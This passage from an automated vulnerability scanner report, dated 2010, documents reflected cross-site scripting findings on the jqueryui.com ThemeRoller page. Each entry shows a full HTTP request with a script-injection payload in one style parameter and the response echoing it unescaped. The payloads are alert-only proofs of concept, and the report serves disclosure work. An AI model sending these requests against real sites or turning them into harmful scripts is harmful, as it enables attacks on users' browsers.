GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px49af1"><script>alert(1)</script>944ac9397d5&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px49af1"><script>alert(1)</script>944ac9397d5&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.57. http://jqueryui.com/themeroller/ [opacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53c37"><script>alert(1)</script>d85e670a993 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=3053c37"><script>alert(1)</script>d85e670a993&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:32:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=3053c37"><script>alert(1)</script>d85e670a993&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

1.58. http://jqueryui.com/themeroller/ [opacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48dd3"><script>alert(1)</script>263e02daba7 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3048dd3"><script>alert(1)</script>263e02daba7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=3048dd3"><script>alert(1)</script>263e02daba7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.59. http://jqueryui.com/themeroller/ [thicknessShadow parameter]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32961"><script>alert(1)</script>b72e4eb2dae was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px32961"><script>alert(1)</script>b72e4eb2dae&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
03e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px32961"><script>alert(1)</script>b72e4eb2dae&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

Report generated by Hoyt LLC at Fri Nov 19 17:35:54 CST 2010.